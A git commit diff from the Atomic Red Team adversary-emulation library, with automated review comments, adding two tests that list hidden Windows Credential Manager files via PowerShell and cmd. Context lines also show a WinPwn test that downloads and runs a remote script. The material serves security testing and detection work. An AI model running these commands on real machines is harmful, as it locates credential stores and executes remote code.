Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2024-07-12 14:59:56 +00:00
parent 7c51b76bcd
commit fd2d2a148d
12 changed files with 136 additions and 3 deletions
+1 -1
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1599-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1601-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
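Review bot: the Atomics badge moving from 1599 to 1601 matches the two new tests in this commit (GUIDs 0d4f2281-f720-4572-adc8-d5bb1618affe and b0cdacf6-8949-4ffe-9274-a9643a788e55 appended to the GUID list below), so the count is consistent; nothing to change in this hunk.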
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
+2
@@ -1571,6 +1571,8 @@ credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,13,List Credential Files via PowerShell,0d4f2281-f720-4572-adc8-d5bb1618affe,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,14,List Credential Files via Command Prompt,b0cdacf6-8949-4ffe-9274-a9643a788e55,command_prompt
credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
@@ -1043,6 +1043,8 @@ credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,13,List Credential Files via PowerShell,0d4f2281-f720-4572-adc8-d5bb1618affe,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,14,List Credential Files via Command Prompt,b0cdacf6-8949-4ffe-9274-a9643a788e55,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
@@ -2182,6 +2182,8 @@
- Atomic Test #10: WinPwn - passhunt [windows]
- Atomic Test #11: WinPwn - SessionGopher [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- Atomic Test #13: List Credential Files via PowerShell [windows]
- Atomic Test #14: List Credential Files via Command Prompt [windows]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1528 Steal Application Access Token](../../T1528/T1528.md)
- Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
@@ -1512,6 +1512,8 @@
- Atomic Test #10: WinPwn - passhunt [windows]
- Atomic Test #11: WinPwn - SessionGopher [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- Atomic Test #13: List Credential Files via PowerShell [windows]
- Atomic Test #14: List Credential Files via Command Prompt [windows]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
+29
@@ -92977,6 +92977,35 @@ credential-access:
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
-consoleoutput -noninteractive "
name: powershell
- name: List Credential Files via PowerShell
auto_generated_guid: 0d4f2281-f720-4572-adc8-d5bb1618affe
description: 'Via PowerShell,list files where credentials are stored in Windows
Credential Manager
'
supported_platforms:
- windows
executor:
command: |
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
name: powershell
elevation_required: true
- name: List Credential Files via Command Prompt
auto_generated_guid: b0cdacf6-8949-4ffe-9274-a9643a788e55
description: 'Via Command Prompt,list files where credentials are stored in
Windows Credential Manager
'
supported_platforms:
- windows
executor:
command: |
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
name: command_prompt
elevation_required: true
T1606.001:
technique:
modified: '2023-09-19T21:25:10.511Z'
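Review bot: both new tests hard-code the profile root as `C:\Users\<username>` (`C:\Users\$usernameinfo\...` in the PowerShell executor, `C:\Users\%USERNAME%\...` in the cmd executor), which breaks whenever the profile directory does not equal the user name (roaming or domain profiles get suffixed directory names, and profiles may live outside `C:\Users`); `$env:USERPROFILE\AppData\Roaming\Microsoft\Credentials\` and `%USERPROFILE%\AppData\Local\Microsoft\Credentials\` resolve correctly in all those cases. Two smaller points in the same block: `(Get-ChildItem Env:USERNAME).Value` is just `$env:USERNAME`, and `elevation_required: true` looks unnecessary for reading directories inside the current user's own profile, so the generated "Elevation Required" banner will mislead people running the test. The descriptions are also missing a space after the comma ("Via PowerShell,list", "Via Command Prompt,list"); since this file is generated, all of these belong in the technique's source YAML (the `atomic_tests:` hunk further down), not here.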
+29
@@ -76181,6 +76181,35 @@ credential-access:
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
-consoleoutput -noninteractive "
name: powershell
- name: List Credential Files via PowerShell
auto_generated_guid: 0d4f2281-f720-4572-adc8-d5bb1618affe
description: 'Via PowerShell,list files where credentials are stored in Windows
Credential Manager
'
supported_platforms:
- windows
executor:
command: |
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
name: powershell
elevation_required: true
- name: List Credential Files via Command Prompt
auto_generated_guid: b0cdacf6-8949-4ffe-9274-a9643a788e55
description: 'Via Command Prompt,list files where credentials are stored in
Windows Credential Manager
'
supported_platforms:
- windows
executor:
command: |
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
name: command_prompt
elevation_required: true
T1606.001:
technique:
modified: '2023-09-19T21:25:10.511Z'
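Review bot: this is the same generated block as in the previous index file, so the hard-coded `C:\Users\<username>` profile path, the `elevation_required: true` flag and the missing space after the comma in both descriptions recur here; fixing them once in the source technique YAML will regenerate both copies.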
+63
@@ -32,6 +32,10 @@ In cloud and/or containerized environments, authenticated user and service accou
- [Atomic Test #12 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials](#atomic-test-12---winpwn---loot-local-credentials---aws-microsoft-azure-and-google-compute-credentials)
- [Atomic Test #13 - List Credential Files via PowerShell](#atomic-test-13---list-credential-files-via-powershell)
- [Atomic Test #14 - List Credential Files via Command Prompt](#atomic-test-14---list-credential-files-via-command-prompt)
<br/>
@@ -409,4 +413,63 @@ SharpCloud -consoleoutput -noninteractive
<br/>
<br/>
## Atomic Test #13 - List Credential Files via PowerShell
Via PowerShell,list files where credentials are stored in Windows Credential Manager
**Supported Platforms:** Windows
**auto_generated_guid:** 0d4f2281-f720-4572-adc8-d5bb1618affe
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
```
<br/>
<br/>
## Atomic Test #14 - List Credential Files via Command Prompt
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
**Supported Platforms:** Windows
**auto_generated_guid:** b0cdacf6-8949-4ffe-9274-a9643a788e55
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
```
<br/>
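Review bot: the rendered "Elevation Required (e.g. root or admin)" line on both new tests is derived from `elevation_required: true`, but the commands only enumerate hidden entries under the current user's own `AppData\Roaming` and `AppData\Local` Credentials directories, which a standard user can read, so the flag should be dropped unless the intent is to run against another user's profile. The fixed `C:\Users\$usernameinfo` / `C:\Users\%USERNAME%` paths would be more robust as `$env:USERPROFILE` / `%USERPROFILE%`, and the descriptions need a space after the comma ("PowerShell,list", "Command Prompt,list"); all of this is inherited from the source YAML and should be fixed there.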
+2
@@ -163,6 +163,7 @@ atomic_tests:
SharpCloud -consoleoutput -noninteractive
name: powershell
- name: List Credential Files via PowerShell
auto_generated_guid: 0d4f2281-f720-4572-adc8-d5bb1618affe
description: |
Via PowerShell,list files where credentials are stored in Windows Credential Manager
supported_platforms:
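Review bot: the added `auto_generated_guid` line is correctly placed and matches the GUID used in the indexes and `used_guids` list; while this block is being touched, the description should read "Via PowerShell, list files ..." (space after the comma), since the rendered docs inherit the typo.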
@@ -176,6 +177,7 @@ atomic_tests:
name: powershell
elevation_required: true
- name: List Credential Files via Command Prompt
auto_generated_guid: b0cdacf6-8949-4ffe-9274-a9643a788e55
description: |
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
supported_platforms:
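Review bot: same as the previous hunk: the GUID b0cdacf6-8949-4ffe-9274-a9643a788e55 is consistent with the indexes, and the description should gain a space after the comma ("Via Command Prompt, list files ...").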
+2
@@ -1638,3 +1638,5 @@ fc369906-90c7-4a15-86fd-d37da624dde6
e672a340-a933-447c-954c-d68db38a09b1
6fb4c4c5-f949-4fd2-8af5-ddbc61595223
5a496325-0115-4274-8eb9-755b649ad0fb
0d4f2281-f720-4572-adc8-d5bb1618affe
b0cdacf6-8949-4ffe-9274-a9643a788e55
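Review bot: both appended GUIDs match the `auto_generated_guid` values added in the technique YAML and the entries in the CSV and markdown indexes, so the generated artefacts are consistent with each other; nothing to change here.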